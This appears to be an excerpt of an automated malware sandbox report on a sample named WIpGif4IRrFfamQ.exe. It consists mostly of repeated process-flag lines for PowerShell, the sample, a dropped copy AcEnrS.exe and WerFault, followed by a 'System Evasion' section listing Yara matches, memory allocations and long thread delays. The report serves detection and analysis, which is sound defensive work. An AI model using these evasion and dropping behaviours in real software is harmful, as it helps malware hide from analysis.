                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTR
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory allocated: 2DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory allocated: 3070000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory allocated: 2DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory allocated: 7C20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory allocated: 7580000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory allocated: 8C20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory allocated: 9C20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory allocated: A2E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory allocated: B2E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory allocated: C2E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory allocated: 13F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory allocated: 2E10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMemory allocated: B10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMemory allocated: 4490000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMemory allocated: 6AE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMemory allocated: 7AE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMemory allocated: 7C70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMemory allocated: 8C70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMemory allocated: 9300000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMemory allocated: A300000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMemory allocated: B300000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMemory allocated: F60000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMemory allocated: 2A70000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMemory allocated: 2870000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 600000Jump to behavior
